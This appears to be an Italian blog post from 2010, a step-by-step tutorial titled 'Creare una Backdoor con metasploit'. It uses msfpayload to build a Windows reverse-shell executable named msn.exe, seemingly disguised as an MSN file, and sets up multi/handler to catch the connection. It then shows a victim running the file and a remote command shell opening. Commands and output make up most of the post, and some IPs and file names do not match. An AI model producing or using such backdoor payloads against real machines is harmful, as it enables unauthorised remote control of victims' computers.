«
»

Creare una Backdoor con metasploit

È possibile usare, da riga di comando, il tool msfpayload per generare payloads da utilizzarsi in molti contesti ed offre una gran varietà di opzioni di output, come ad esempio uno specifico formato eseguibile.

Possiamo ad esempio generare un eseguibile Windows di tipo reverse shell che si riconnetta a noi sulla porta 31337 (msfpayload opera come msfcli nel senso che si può appendere la lettera “O” al termine della stringa di comando, per vedere quali opzioni siano disponibili).

# cd /opt/metasploit3/msf3
# ./msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
    Version: 7075
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Description:
  Connect back to attacker and spawn a command shell


# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=31337 X >/tmp/msn.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: LHOST=192.168.1.101,LPORT=31337
# file /tmp/mata_hari.exe
/tmp/mata_hari.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
# ls -l /tmp/msn.exe
-rw-r--r-- 1 root root 37888 2010-01-11 12:31 /tmp/msn.exe

Ora che abbiamo ottenuto il nostro eseguibile (e prima che qualcuno lo mandi in esecuzione), dovremo usare il modulo ‘multi/handler’, che serve a gestire gli exploits lanciati esternalmente al framework.

# ./msfconsole
[...]
msf > use exploit/multi/handler
msf exploit(handler) >

Quando si utilizza il modulo “exploit/multi/handler”, occorre ancora specificare quale sia il payload da attendersi e su quale porta attendere, per cui andranno impostate con gli stessi parametri dell’eseguibile precedentemente generato

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp.
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started reverse handler on port 31337

[*] Starting the payload handler…

vediamo cosa succede nel caso in cui una vittima mandi in esecuzione il file precedentemente generato.

[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.10:31337 -> 192.168.1.253:1049)

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\ago\Documenti\Download>

Il modulo multi/handler ha gestito l’ exploit e ci presenta una shell..

Questo post è stato pubblicato il febbraio 13, 2010 alle 11:17 pm ed è archiviato in Creare una Blakdoor con metasploit . Puoi seguire i commenti a questo post con il feed RSS 2.0. Puoi lasciare una risposta, o mandare un trackback dal tuo sito.

Una Risposta to “Creare una Backdoor con metasploit”

  1. love89 Dice:
    febbraio 14, 2010 a 5:46 pm

    ciao scusa puoi aggiugermi su msn vorrei chiederti di spiegarmi una cosa grazie

    Replica

Lascia un Commento

Fill in your details below or click an icon to log in:

Gravatar
Logo WordPress.com

You are commenting using your WordPress.com account. Log Out / Modifica )

Foto Twitter

You are commenting using your Twitter account. Log Out / Modifica )

Foto di Facebook

You are commenting using your Facebook account. Log Out / Modifica )

Annulla

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 35 other followers